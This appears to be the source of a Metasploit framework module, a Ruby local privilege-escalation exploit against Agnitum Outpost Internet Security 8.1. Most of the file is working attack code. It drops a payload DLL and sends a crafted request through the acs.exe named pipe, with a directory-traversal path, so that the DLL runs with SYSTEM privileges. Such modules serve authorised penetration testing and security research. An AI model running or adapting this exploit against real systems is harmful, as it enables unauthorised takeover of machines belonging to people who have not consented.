Path: blob/master/modules/exploits/windows/local/agnitum_outpost_acs.rb
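##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against Agnitum Outpost Internet Security 8.1.
#
# Flow (see #exploit): open the acs.exe IPC named pipe, drop a payload DLL in a
# writable directory on the target (WritableDir, defaulting to %TEMP%), then send
# one request over the pipe whose path field walks up DEPTH levels and back down
# to the dropped DLL. The dropped file is registered with FileDropper so it is
# removed on session cleanup; the pipe handle is closed on every exit path.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Exploit::FileDropper

  # IPC endpoint exposed by acs.exe; every pipe open/write in this module goes through it.
  PIPE_NAME = "\\\\.\\pipe\\acsipc_server".freeze

  # Value CreateFileA reports on failure; compared against railgun's 'return' field.
  INVALID_HANDLE_VALUE = 0xFFFFFFFF

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Agnitum Outpost Internet Security Local Privilege Escalation',
          'Description' => %q{
            This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
            Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load
            arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
            code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
            Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Ahmad Moghimi', # Vulnerability discovery
            'juan vazquez' # MSF module
          ],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'Privileged' => true,
          'Targets' => [
            [ 'Agnitum Outpost Internet Security 8.1', {} ],
          ],
          'Payload' => {
            'Space' => 2048,
            'DisableNops' => true
          },
          'References' => [
            [ 'OSVDB', '96208' ],
            [ 'EDB', '27282' ]
          ],
          'DisclosureDate' => '2013-08-02',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_railgun_api
                stdapi_sys_config_getenv
              ]
            }
          }
        }
      )
    )

    register_options([
      # OptString rather than OptPath: the directory lives on the *remote* host, so it
      # must not be validated against the local filesystem.
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
    ])
  end

  # Four random alphabetic bytes read back as a little-endian 32-bit integer;
  # fills an opaque DWORD in the request header built by #write_named_pipe.
  def junk
    rand_text_alpha(4).unpack("V").first
  end

  # Opens +pipe+ for read/write through the session's kernel32 via railgun.
  #
  # @param pipe [String] full pipe path, e.g. PIPE_NAME
  # @return [Integer, nil] the handle, or nil when CreateFileA reports INVALID_HANDLE_VALUE
  def open_named_pipe(pipe)
    r = session.railgun.kernel32.CreateFileA(
      pipe,
      "GENERIC_READ | GENERIC_WRITE",
      0x3, # FILE_SHARE_READ | FILE_SHARE_WRITE
      nil,
      "OPEN_EXISTING",
      "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL",
      0
    )
    handle = r['return']
    return nil if handle == INVALID_HANDLE_VALUE

    handle
  end

  # Closes a handle obtained from #open_named_pipe.
  #
  # @param handle [Integer] open handle
  def close_handle(handle)
    session.railgun.kernel32.CloseHandle(handle)
  end

  # Sends the DLL load request over the pipe.
  #
  # @param handle [Integer] open pipe handle
  # @param dll_path [String] directory holding the dropped DLL (a leading drive prefix is stripped)
  # @param dll_name [String] file name of the dropped DLL
  # @return [Integer, nil] bytes written as reported by WriteFile, or nil when the call fails
  def write_named_pipe(handle, dll_path, dll_name)
    traversal = "..\\" * datastore["DEPTH"]
    relative = dll_path.gsub(/^[a-zA-Z]+:\\/, "") # drop the drive prefix (e.g. C:\)
    path = Rex::Text.to_unicode("#{traversal}#{relative}\\#{dll_name}")

    # Body layout is kept as in the original module. The 0x11 zero bytes and the
    # trailing NULs are opaque here — presumably header fields and a wide-string
    # terminator plus padding; confirm against the acs.exe request format.
    data = "\x00" * 0x11
    data << path
    data << "\x00\x00"
    data << "\x00\x00\x00"

    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
    buf << [0x17].pack("V") # command
    buf << [junk].pack("V")
    buf << [data.bytesize].pack("V") # bytesize: data carries UTF-16 bytes, not characters
    buf << [0, 0, 0].pack("V*")
    buf << data

    # The trailing 4 is, per railgun convention, the size of the lpNumberOfBytesWritten out-buffer.
    w = client.railgun.kernel32.WriteFile(handle, buf, buf.bytesize, 4, nil)

    unless w['return']
      print_error("There was an error writing to the named pipe, check permissions")
      return nil
    end

    w['lpNumberOfBytesWritten']
  end

  # Detected when the acs.exe pipe can be opened from this session, Safe otherwise.
  #
  # @return [Exploit::CheckCode]
  def check
    handle = open_named_pipe(PIPE_NAME)
    return Exploit::CheckCode::Safe if handle.nil?

    close_handle(handle)
    Exploit::CheckCode::Detected
  end

  # Entry point: open the pipe, drop the payload DLL, send the load request.
  # Every failure path closes the pipe handle before calling fail_with.
  def exploit
    print_status("Opening named pipe...")
    handle = open_named_pipe(PIPE_NAME)
    fail_with(Failure::NoTarget, "#{PIPE_NAME} named pipe not found") if handle.nil?
    print_good("#{PIPE_NAME} found! Proceeding...")

    # WritableDir wins when set and non-empty; otherwise fall back to the session's %TEMP%.
    temp_dir = datastore["WritableDir"]
    temp_dir = client.sys.config.getenv('TEMP') if temp_dir.to_s.empty?

    print_status("Using #{temp_dir} to drop malicious DLL...")
    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      close_handle(handle)
      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
    end

    print_status("Writing malicious DLL to remote filesystem")
    write_path = pwd
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
    begin
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
      write_file(dll_name, generate_payload_dll)
      register_file_for_cleanup("#{write_path}\\#{dll_name}")
    rescue Rex::Post::Meterpreter::RequestError
      close_handle(handle)
      fail_with(Failure::BadConfig, "Failed to drop payload into #{temp_dir}")
    end

    print_status("Exploiting through #{PIPE_NAME}...")
    bytes = write_named_pipe(handle, write_path, dll_name)
    close_handle(handle)

    fail_with(Failure::Unknown, "Failed while writing to #{PIPE_NAME}") if bytes.nil?
  end
end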